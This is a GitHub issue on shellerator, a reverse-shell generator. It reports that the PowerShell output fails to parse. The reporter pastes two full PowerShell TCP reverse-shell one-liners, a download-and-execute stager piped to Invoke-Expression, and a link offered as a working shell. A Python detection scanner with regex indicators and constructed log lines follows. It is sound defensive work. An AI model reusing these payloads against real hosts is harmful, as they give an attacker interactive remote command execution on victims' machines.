ShutdownRepo / shellerator

Simple CLI tool for the generation of bind and reverse shells in multiple languages
GNU General Public License v3.0

[BUG] Powershell reverseshell does not work #14

Open goreil opened 2 weeks ago

goreil commented 2 weeks ago

Both generated powershell reverse shells do not work:

I used the following command to generate the reverse shells:

# shellerator  --type powershell --lport 443 --lhost 127.0.0.1

[1] powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("127.0.0.1",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

[2] powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

CLI command used
/root/.local/bin/shellerator --reverse-shell --type powershell --lhost 127.0.0.1 --lport 443

Running them on a Windows host yields a lot of syntax errors:

> Invoke-RestMethod '127.0.0.1/rev1.ps1' | Invoke-Expression
At line:1 char:75
+ ...  System.Net.Sockets.TCPClient('127.0.0.1',443); = .GetStream();[byte[ ...
+                                                                  ~
An expression was expected after '('.
At line:1 char:122
+ ...  = .GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length ...
+                                                                  ~
Missing expression after ','.
At line:1 char:123
+ ... tream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0 ...
+                                                           ~~~~~~~
Unexpected token '.Length' in expression or statement.
At line:1 char:122
+ ...  = .GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length ...
+                                                                  ~
Missing closing ')' in expression.
At line:1 char:132
+ ... eam();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){ ...
+                                                                  ~
Missing statement body in while loop.
At line:1 char:138
+ ... byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (Ne ...
+                                                                 ~
Unexpected token ')' in expression or statement.
At line:1 char:203
+ ... = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = ...
+                                                                  ~
Missing ')' in method call.
At line:1 char:206
+ ... New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (i ...
+                                                                  ~
Missing expression after ',' in pipeline element.
At line:1 char:139
+ ... yte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (New ...
+                                                                 ~
Missing closing '}' in statement block or type definition.
At line:1 char:207
+ ... w-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (iex ...
+                                                                 ~
Unexpected token ')' in expression or statement.
Not all parse errors were reported.  Correct the reported errors and try again.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ExpectedExpression

Fix: Use a working reverse shell like this one:

https://gist.githubusercontent.com/egre55/c058744a4240af6515eb32b2d33fbed3/raw/3ad91872713d60888dca95850c3f6e706231cb40/powershell_reverse_shell.ps1
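From the defender's side, both payloads quoted above share a handful of static strings (`System.Net.Sockets.TCPClient`, `.GetStream()`, `iex`, the `$stream.Write($sendbyte,0,$sendbyte.Length)` call, the `Invoke-RestMethod ... | Invoke-Expression` stager) that survive even in the variable-stripped form shown in the error output. The Python below is an added example, not code from shellerator or from this issue: it scores constructed process-creation log lines for those indicators and flags the stager, the working payload and the mangled payload while leaving routine admin PowerShell alone. The `host=... CommandLine=...` log layout, the indicator weights and the threshold are all assumptions of this example.

```python
"""Score process-creation log lines for the PowerShell TCPClient/iex
reverse-shell pattern quoted in the shellerator issue.
Added example, not part of shellerator; all log lines are constructed."""
import re
from dataclasses import dataclass

# (name, pattern, weight). Patterns are lifted from the payloads in the issue;
# weights and THRESHOLD are this example's own assumptions, to be tuned per estate.
INDICATORS = [
    ("tcpclient",     re.compile(r"System\.Net\.Sockets\.TCPClient", re.I), 3),
    ("getstream",     re.compile(r"\.GetStream\(\)", re.I), 2),
    ("iex",           re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 2),
    ("stream_write",  re.compile(r"\.Write\(\$\w+,\s*0,\s*\$\w+\.Length\)", re.I), 2),
    ("download_exec", re.compile(
        r"\b(Invoke-RestMethod|Invoke-WebRequest|iwr|irm|DownloadString)\b"
        r"[^|]*\|\s*(iex|Invoke-Expression)\b", re.I), 3),
    ("hidden_window", re.compile(r"-W(indowStyle)?\s+Hidden\b", re.I), 1),
    ("exec_bypass",   re.compile(r"-Exec(utionPolicy)?\s+Bypass\b", re.I), 1),
    ("noprofile",     re.compile(r"-NoP(rofile)?\b", re.I), 1),
]
THRESHOLD = 5  # assumption: a lone -NoProfile or -ExecutionPolicy Bypass never fires

# Constructed log layout (not a real Windows event format): host=... CommandLine=...
CMDLINE_RX = re.compile(r"host=(?P<host>\S+).*?CommandLine=(?P<cmd>.*)$")


@dataclass
class Finding:
    line_no: int
    host: str
    score: int
    hits: list
    command: str


def score_command(cmd):
    """Return (total weight, [indicator names]) for one command line."""
    hits = [(name, w) for name, rx, w in INDICATORS if rx.search(cmd)]
    return sum(w for _, w in hits), [name for name, _ in hits]


def scan(lines, threshold=THRESHOLD):
    """Parse each constructed log line and keep those scoring at or above threshold."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = CMDLINE_RX.search(line)
        if not m:
            continue
        score, hits = score_command(m.group("cmd"))
        if score >= threshold:
            findings.append(Finding(n, m.group("host"), score, hits, m.group("cmd")))
    return findings


# Constructed sample: benign admin use, the stager from the issue, the working
# payload [2], the variable-stripped variant the error output shows, benign again.
SAMPLE_LOG = [
    "2024-05-01T09:12:03Z EventID=4688 host=WS01 user=alice CommandLine=powershell -NoProfile -Command Get-Process | Sort-Object CPU",
    "2024-05-01T09:13:44Z EventID=4688 host=WS01 user=alice CommandLine=powershell -c Invoke-RestMethod '127.0.0.1/rev1.ps1' | Invoke-Expression",
    "2024-05-01T09:13:45Z EventID=4688 host=WS01 user=alice CommandLine=powershell -nop -c $client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()",
    "2024-05-01T09:20:10Z EventID=4688 host=WS02 user=bob CommandLine=powershell -nop -c New-Object System.Net.Sockets.TCPClient('127.0.0.1',443); = .GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (iex  2>&1 | Out-String )};.Close()",
    "2024-05-01T10:01:00Z EventID=4688 host=SRV01 user=svc_backup CommandLine=powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no} host={f.host} score={f.score} hits={','.join(f.hits)}")
```

Note that the mangled line still scores 8: stripping `$client` and `$stream` breaks execution but leaves the class and method names intact, so a static indicator rule keeps firing on failed attempts like the one reported here. Only the `stream_write` indicator, which keys on the `$var.Length` argument shape, drops out.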

ShutdownRepo commented 2 weeks ago

Hello, thank you for raising the issue. However, I don't have the time to implement the fix. I'd be happy to review and merge a pull request 😉